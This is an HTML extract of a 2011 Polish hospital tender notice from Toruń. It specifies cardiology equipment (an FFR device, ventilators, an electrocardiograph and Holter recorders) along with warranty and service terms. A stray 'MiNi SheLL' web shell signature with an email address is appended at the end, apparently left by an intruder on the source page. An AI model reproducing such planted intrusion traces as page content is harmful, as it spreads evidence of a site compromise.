<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bielany.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych - pokój nr 2
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera 
ul. Św. Józefa 53/59, 87- 100 Toruń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2011 godzina 09:30, miejsce: Kancelaria
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53/59, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie finansowane w ramach projektu nr PL 0480 pn.  Zwiększenie dostępności do wysokospesjalistycznej  opieki kardiologicznej w Wojewódzkim Szpitalu Zespolonym w Toruniu. Finansowanie w 85% z Mechanizmu Finansowania EOG i w 15% z budżetu Samorządu Województwa Kujawsko-Pomorskiego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 - 1 kpl. aparatu do pomiaru gradientu przezzwężeniowego FFR 
z prowadnikami.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Aparat do pomiaru gradientu przezzwężeniowego FFR - 1 szt. 
<br>1.1 Urządzenie przenośne o wadze < 0,3 kg
<br>1.2 Możliwość montażu do statywu albo do stołu zabiegowego
<br>1.3 Monochromatyczny wyświetlacz LCD
<br>1.4 Zakres pomiarów ciśnienia: -30 do + 330 mmHg
<br>1.5 Dokładność pomiaru: ?3 mmHg (w zakresie od -30 do +100 mmHg) i ?3% (powyżej 100 mmHg)
<br>1.6 Podłączenie aparatu FFR za pomocą kabla do istniejącego fizjosystemu 
<br>2. Prowadnik do pomiaru gradientu przezzwężeniowego FFR - 15 szt. 
<br>2.1 Średnica 0,014 cali
<br> 2.2 Długość: 185 cm i 300 cm
<br>2.3 Końcówka prosta i J
<br> 2.4 Miękka, atraumatyczna końcówka
<br>3. Warunki gwarancji i serwisu
<br>3.1 Gwarancja - min. 24 miesiące
<br> 3.2 Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat.
<br>3.3 Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika 
<br>3.4 Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji
<br>3.5 Bezpłatne szkolenie pracowników Zamawiającego obsługujących urządzenie 
<br>3.6 Bezpłatna instalacja urządzenia 
<br>3.7 Aparat zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji)
<br>3.8 Instrukcja obsługi w języku polskim.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2 - 3 szt. respiratorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zasilanie elektryczne AC 230V 50Hz +/-  10%
<br>2. Respirator wyposażony w pojedynczy, podstawowy  kolorowy ekran LCD min. 12 cali regulowany w min. dwóch płaszczyznach (niezależnie od obudowy respiratora)
<br>3. Zasilanie akumulatorowe na minimum 30 min. 
<br>4. Zasilanie w powietrze i tlen medyczny z centralnej szpitalnej instalacji gazów (min. 3 - 6 bar)
<br>5. Możliwość awaryjnej pracy przy zasilaniu tylko jednym gazem (O2 lub powietrze)
<br>6. Wentylacja PCV (ciśnieniowo zmienna)
<br>7.
Wentylacja VCV  (objętościowo zmienna)
<br>8. Wentylacja ciśnieniowa dwupoziomowa typu
(Bi-Level, BiPAP, DuoPAP)
<br>9. Wentylacja z zadaną objętością z ograniczeniem ciśnienia
<br>10. Wentylacja wspomagania oddechu spontanicznego ciśnieniem 
<br>11. Wentylacja SIMV kontrolowana objętościowo i ciśnieniowo
<br>12. Wentylacja z zadanym ciśnieniem z gwarantowaną objętością
<br>13.Możliwość ustawienia parametrów wentylacji bezdechu z aktywacją w czasie min. 10 do 60 s.
<br>14. Oddech ręczny
<br>Zakres objętości pojedynczego oddechu  min. 20 - 2000 ml 
<br>15. Zakres częstości oddychania w zakresie od   min. 5 - 120 oddechów/min
<br>16. I:E min. 4:1 do 1:9
<br>17. Ciśnienie wdechowe  min. 5 - 95 cm H2O
<br>18. Ciśnienie wspomagania min. 0 - 50 cm H2O
<br>19. PEEP/CPAP min. do 50 cm H2O
<br>20. Stężenie O2 w mieszaninie oddechowej regulowane płynnie w zakresie min. 21 - 100%
<br>21. Przepływ bazowy regulowany ręcznie w zakresie min. 2-9 L/min
<br>22. Wyzwalanie oddechu - czułość przepływowa regulowana w zakresie min. od 1 - 8 L/min
<br>23. Wyzwalanie oddechu - regulacja (płynna lub skokowa) czułości ciśnieniowej w zakresie min. od -1 do -8 cmH2O
<br>24. Pomiar pojemności życiowej płuc pacjenta - VC
<br>25. Pomiar NIF
<br>26. Procedura P 0.1
<br>27. Nebulizer
<br>28. Monitorowanie stężenia O2 - Pomiar tlenu za pomocą  wewnętrznego, elektronicznego (niechemicznego) czujnika tlenowego nie wymagającego okresowej wymiany
<br>29. Pomiary spirometryczne z kreśleniem minimum  trzech różnych pętli spirometrycznych
<br>30. Monitorowanie częstości oddechów
<br>31. Zatrzymanie wdechu
<br>32. Zatrzymanie wydechu
<br>33. Funkcja ułatwiająca natlenienie pacjenta przed odsysaniem z zatrzymaniem pracy respiratora w trybie gotowość i wyłączenie alarmów na minimum 120 sekund
<br>34. Monitorowanie objętości pojedynczego oddechu i objętości minutowej oddechów kontrolowanych
<br>35. Pomiar oporów i podatności dynamicznej układu oddechowego
<br>36. Regulacja czasu narastania oddechów
<br>37. Monitorowanie ciśnienia minimalnego, szczytowego, średniego
<br>38. Monitorowanie przepływu w układzie pacjenta
<br>39. Pamięć alarmów
<br>40. Alarm bezdechu z możliwością uruchomienia trybu wentylacji bezdechu
<br>41. Alarm objętości minutowej 
<br>42. Alarm ciśnienia w układzie oddechowym 
<br>43. Alarm częstości oddechowej
<br>44. Alarm stężenia tlenu
<br>45. Alarm braku zasilania gazowego i elektrycznego
<br>46. Alarmy techniczne z podaniem informacji w j. polskim
<br>47. Pamięć trendów wszystkich parametrów wentylacji (nastawianych i monitorowanych)  zapisywana i prezentowana w respiratorze min. 7 dni
<br>48. Respirator umieszczony na wózku jezdnym, min. 2 koła z blokadą
<br>49. Obsługa respiratora w języku polskim: menu przycisków , komunikaty ekranowe
<br>50. Sterylizowalny w autoklawie układ oddechowy dla dorosłych: rury oddechowe, złączka Y - 2 kpl. 
<br>51. Filtr HME (sztuczny nos) - 10 szt. dla dorosłych.
<br>52. Instrukcja obsługi w języku polskim wraz ze szkoleniem personelu
<br>53. Warunki gwarancji i serwisu
<br>54. Gwarancja - min. 24 miesiące
<br>55. Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat.
<br>56. Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika 
<br>57. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji
<br>58. Bezpłatne szkolenie pracowników Zamawiającego obsługujących urządzenie 
<br>59. Bezpłatna instalacja urządzenia 
<br>60.  Aparat zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji)
<br>61. Instrukcja obsługi w języku polskim.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.74.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3 - 1 szt. elektrokardiografu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Częstotliwość próbkowania sygnału ekg przez aparat - min. 1000 próbek /s
<br>2. Współczynnik tłumienia szumów przez aparat CMRR>120dB
<br>3. Rozdzielczość sygnału wejściowego aparatu - min. 4 uV
<br>4. Zakres częstotliwości pomiarowej aparatu -  min. 0,05-100Hz
<br>5. Filtr sieciowy 50 Hz
<br>6. Filtr mięśniowy w zakresie od 20 do 150 Hz
<br>7. Niwelowanie płynięcia izolinii (automatyczne sprowadzanie linii zerowej)
<br>8. Kolorowy wyświetlacz graficzny LCD min. 7cali
<br>9. Praca w trybie zasilania sieciowego
<br>10. Praca w trybie zasilania bateryjnego
<br>11. Możliwość monitorowania pacjenta z wewnętrznego akumulatora przez min.3 godziny
<br>12. Czas ładowania akumulatorów max. 2,5 godziny
<br>13. Rejestracja przebiegów na papierze formatu A4
<br>14. Równoczesna rejestracja 12 odprowadzeń
<br>15. Prezentacja graficzna badania w postaci  3, 6 lub 12 krzywych na jednej stronie
<br>16. Wybór różnych raportów w trybie auto
<br>17. Pomiar parametrów krzywej ekg
<br>18. Wykrywanie wszczepionego stymulatora
<br>19. Zabezpieczenie aparatu przed impulsem defibrylacji
<br>20. Klawiatura alfanumeryczna plus klawisze funkcyjne i klawisz nawigacji
<br>21. Masa aparatu do 6 kg 
<br>22. Badanie ekg - tryb manual
<br>23. Badanie ekg - tryb auto
<br>24. Tryb arytmii
<br>25. Czułość (AUTO, 5, 10 , 20, 40 mm/mV)
<br>26. Prędkość wydruku: 5; 12.5; 25; 50 mm/s
<br>27. Wyświetlanie danych pacjenta na ekranie 
<br>28. Wyświetlanie  od 3 do12 przebiegów krzywych EKG na ekranie
<br>29. Identyfikacja grupy odprowadzeń
<br>30. Wynik obliczonego parametru HR
<br>31. Sygnalizacja włączenia / wyłączenia filtrów
<br>32. Wizualna i akustyczna sygnalizacja braku kontaktu elektrod
<br>33. Kabel ekg modułowy z możliwością wymiany pojedynczych przewodów pacjenta 
<br>34. Kabelki pacjenta typu - banan
<br>35. Wyposażenie w elektrody przedsercowe (przyssawkowe) i  kończynowe (klamrowe) 
<br>36. Wózek z pojemnikiem na akcesoria
<br>37. Gniazdo karty pamięci typu SD
<br>38. Wyjście do podłączenia zewnętrznego monitora 
<br>39. Komunikacja z użytkownikiem w języku polskim 
<br>40. Warunki gwarancji i serwisu
<br>41.Okres gwarancji - min 24 miesiące 
<br>42.Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika
<br>43. Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat
<br>44. Bezpłatne szkolenie pracowników Zamawiającego  obsługującego urządzenie
<br>45.Instrukcja obsługi w języku polskim
<br>46. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji
<br>47. Bezpłatna instalacja urządzenia 
<br>48.Elektrokardiograf zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancyjnym).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.32.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr 4 - 4 szt. holterów EKG 7- dniowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Waga bez baterii maks. 65g
<br>2. Wyświetlacz ciekłokrystaliczny min. 1,9 cala
<br>3. Jednoczesna rejestracja sygnału EKG z trzech odprowadzeń z projekcją do 12 odprowadzeń
<br>4. Zdefiniowana rozdzielczość przetwornika analogowo cyfrowego 10 bitów
<br>5. Skokowa regulacja wzmocnienia 0,5x, 1x, 2x
<br>6. Czas rejestracji - 7 dni
<br>7. Częstotliwość próbkowania 175 próbek/sek.
<br>8. Komunikacja z analizatorem poprzez gniazdo USB
<br>9. Weryfikacja jakości sygnału EKG oraz jakości kontaktu elektrod ze skórą poprzez wyświetlacz LCD
<br>10. Rejestracja sygnału EKG bez kompresji
<br>11. Detekcja sygnału ze stymulatora
<br>12. Przycisk zdarzeń aktywny podczas rejestracji sygnału ekg
<br>13. Analiza zarejestrowanego sygnału EKG możliwa przy użyciu analizatora holterowskiego Zymed 1810 będącego własnością Zamawiającego
<br>14. Komunikacja z użytkownikiem w języku polskim. 
<br>15. Warunki gwarancji i serwisu
<br>16. Gwarancja - min. 24 miesiące
<br>17. Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat.
<br>18. Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika 
<br>19. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji
<br>20. Bezpłatne szkolenie pracowników Zamawiającego obsługujących urządzenie 
<br>21. Bezpłatna instalacja urządzenia 
<br>22. Instrukcja obsługi w języku polskim
<br>23. Aparat zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.32.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com